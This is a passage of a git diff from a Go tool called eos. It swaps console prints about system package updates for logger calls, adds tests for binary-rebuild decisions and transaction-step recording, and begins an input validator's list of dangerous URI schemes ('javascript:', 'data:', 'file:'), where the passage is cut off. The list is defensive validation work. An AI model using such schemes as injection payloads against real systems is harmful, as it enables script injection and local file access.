- fmt.Println(" 2. sudo yum autoremove -y (remove old packages)")
- case system.PackageManagerDnf:
- fmt.Println(" 1. sudo dnf update -y (update packages)")
- fmt.Println(" 2. sudo dnf autoremove -y (remove old packages)")
- case system.PackageManagerPacman:
- fmt.Println(" 1. sudo pacman -Syu (update packages)")
- }
-
- fmt.Println("")
- fmt.Println("IMPORTANT:")
- fmt.Println(" • This may take 5-30 minutes depending on your system")
- fmt.Println(" • Some updates may require a system reboot")
- fmt.Println(" • You can skip this and update packages manually later")
- fmt.Println("")
+ eeu.logger.Info("System package update available",
+ zap.String("manager", string(packageManager)))
+ eeu.logger.Info("System package updates ensure build dependencies are current. This may take 5-30 minutes. Some updates may require a reboot. You can skip and update manually later")
// Ask for consent
confirmed, err := interaction.PromptYesNoSafe(eeu.rc,
@@ -1458,27 +1487,12 @@ func (eeu *EnhancedEosUpdater) UpdateSystemPackages() error {
}
if !confirmed {
- eeu.logger.Info("User declined system package updates")
- fmt.Println("\nSkipping system package updates.")
- fmt.Println("You can update manually with:")
-
- switch packageManager {
- case system.PackageManagerApt:
- fmt.Println(" sudo apt update && sudo apt upgrade -y")
- case system.PackageManagerYum:
- fmt.Println(" sudo yum update -y")
- case system.PackageManagerDnf:
- fmt.Println(" sudo dnf update -y")
- case system.PackageManagerPacman:
- fmt.Println(" sudo pacman -Syu")
- }
-
+ eeu.logger.Info("User declined system package updates. Update manually with your package manager when ready")
return nil
}
// User consented - proceed with update
- eeu.logger.Info("User consented to system package updates")
- fmt.Println("\nUpdating system packages...")
+ eeu.logger.Info("User consented to system package updates, proceeding")
return system.UpdateSystemPackages(eeu.rc, packageManager)
}
diff --git a/pkg/self/updater_enhanced_test.go b/pkg/self/updater_enhanced_test.go
index b66e57d41..69318aed9 100644
--- a/pkg/self/updater_enhanced_test.go
+++ b/pkg/self/updater_enhanced_test.go
@@ -9,12 +9,16 @@ import (
"context"
"fmt"
"os"
+ "os/exec"
"path/filepath"
+ "strings"
"sync"
"testing"
+ "time"
"github.com/CodeMonkeyCybersecurity/eos/pkg/crypto"
"github.com/CodeMonkeyCybersecurity/eos/pkg/eos_io"
+ "github.com/CodeMonkeyCybersecurity/eos/pkg/shared"
"github.com/stretchr/testify/assert"
"github.com/stretchr/testify/require"
)
@@ -384,3 +388,120 @@ func TestCreateTransactionBackup_FilesystemErrors(t *testing.T) {
assert.Error(t, err, "should fail when backup directory is not writable")
})
}
+
+func TestShouldBuildBinary(t *testing.T) {
+ rc := &eos_io.RuntimeContext{Ctx: context.Background()}
+ repoDir := initSelfUpdateGitRepo(t)
+
+ origBuildCommit := shared.BuildCommit
+ t.Cleanup(func() {
+ shared.BuildCommit = origBuildCommit
+ })
+
+ config := &EnhancedUpdateConfig{
+ UpdateConfig: &UpdateConfig{
+ SourceDir: repoDir,
+ BinaryPath: filepath.Join(t.TempDir(), "eos"),
+ BackupDir: t.TempDir(),
+ GitBranch: "main",
+ },
+ }
+
+ updater := NewEnhancedEosUpdater(rc, config)
+ headCommit := gitHead(t, repoDir)
+
+ t.Run("skip when installed binary matches source commit", func(t *testing.T) {
+ shared.BuildCommit = headCommit
+
+ buildNeeded, reason := updater.shouldBuildBinary()
+ assert.False(t, buildNeeded)
+ assert.Contains(t, reason, "already matches")
+ })
+
+ t.Run("rebuild when installed binary commit differs", func(t *testing.T) {
+ shared.BuildCommit = "deadbeef"
+
+ buildNeeded, reason := updater.shouldBuildBinary()
+ assert.True(t, buildNeeded)
+ assert.Contains(t, reason, "differs")
+ })
+
+ t.Run("rebuild when installed binary has no embedded commit", func(t *testing.T) {
+ shared.BuildCommit = ""
+
+ buildNeeded, reason := updater.shouldBuildBinary()
+ assert.True(t, buildNeeded)
+ assert.Contains(t, reason, "differs")
+ })
+
+ t.Run("rebuild when source commit cannot be determined", func(t *testing.T) {
+ shared.BuildCommit = headCommit
+
+ badConfig := &EnhancedUpdateConfig{
+ UpdateConfig: &UpdateConfig{
+ SourceDir: filepath.Join(repoDir, "missing"),
+ BinaryPath: filepath.Join(t.TempDir(), "eos"),
+ BackupDir: t.TempDir(),
+ GitBranch: "main",
+ },
+ }
+ badUpdater := NewEnhancedEosUpdater(rc, badConfig)
+
+ buildNeeded, reason := badUpdater.shouldBuildBinary()
+ assert.True(t, buildNeeded)
+ assert.Contains(t, reason, "unavailable")
+ })
+}
+
+func TestRecordTransactionStep(t *testing.T) {
+ rc := &eos_io.RuntimeContext{Ctx: context.Background()}
+ updater := NewEnhancedEosUpdater(rc, &EnhancedUpdateConfig{
+ UpdateConfig: &UpdateConfig{
+ SourceDir: t.TempDir(),
+ BinaryPath: filepath.Join(t.TempDir(), "eos"),
+ BackupDir: t.TempDir(),
+ GitBranch: "main",
+ },
+ })
+
+ started := time.Now().Add(-25 * time.Millisecond)
+ updater.recordTransactionStep("build_binary", "completed", "Build new eos binary from source", started)
+
+ require.Len(t, updater.transaction.Steps, 1)
+ step := updater.transaction.Steps[0]
+ assert.Equal(t, "build_binary", step.Name)
+ assert.Equal(t, "completed", step.Status)
+ assert.Equal(t, "Build new eos binary from source", step.Message)
+ assert.False(t, step.OccurredAt.IsZero())
+ assert.GreaterOrEqual(t, step.Duration, 20*time.Millisecond)
+}
+
+func initSelfUpdateGitRepo(t *testing.T) string {
+ t.Helper()
+
+ repoDir := t.TempDir()
+ runSelfGitCmd(t, repoDir, "init")
+ runSelfGitCmd(t, repoDir, "config", "user.email", "eos-tests@example.com")
+ runSelfGitCmd(t, repoDir, "config", "user.name", "Eos Tests")
+ require.NoError(t, os.WriteFile(filepath.Join(repoDir, "README.md"), []byte("eos\n"), 0o644))
+ runSelfGitCmd(t, repoDir, "add", "README.md")
+ runSelfGitCmd(t, repoDir, "commit", "-m", "initial commit")
+
+ return repoDir
+}
+
+func gitHead(t *testing.T, repoDir string) string {
+ t.Helper()
+
+ out, err := exec.Command("git", "-C", repoDir, "rev-parse", "HEAD").CombinedOutput()
+ require.NoError(t, err, "git rev-parse HEAD failed: %s", string(out))
+ return strings.TrimSpace(string(out))
+}
+
+func runSelfGitCmd(t *testing.T, repoDir string, args ...string) {
+ t.Helper()
+
+ cmd := exec.Command("git", append([]string{"-C", repoDir}, args...)...)
+ out, err := cmd.CombinedOutput()
+ require.NoError(t, err, "git %v failed: %s", args, string(out))
+}
diff --git a/pkg/shared/security_validators.go b/pkg/shared/security_validators.go
index ce9e6d972..f3ec5bc54 100644
--- a/pkg/shared/security_validators.go
+++ b/pkg/shared/security_validators.go
@@ -47,7 +47,7 @@ func (sv *SecurityValidators) ValidateNetworkInput(input, fieldName string) erro
dangerousPatterns := []string{
"javascript:", "data:", "file:", "ftp:",
"]